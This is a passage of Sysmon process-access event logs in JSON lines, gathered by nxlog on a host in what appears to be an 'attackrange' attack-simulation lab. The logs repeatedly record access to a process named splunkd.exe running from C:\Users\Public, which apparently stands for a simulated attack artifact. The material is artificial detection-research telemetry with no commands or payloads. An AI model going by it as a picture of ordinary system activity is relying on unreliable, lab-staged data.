(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:38.547","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6496,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:39.547\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:39.547","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6497,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:40.547\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:40.547","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6498,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:41.547\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:41.547","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6499,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:42.547\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:42.547","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6500,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:43.547\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:43.547","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6501,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:44.547\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:44.547","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
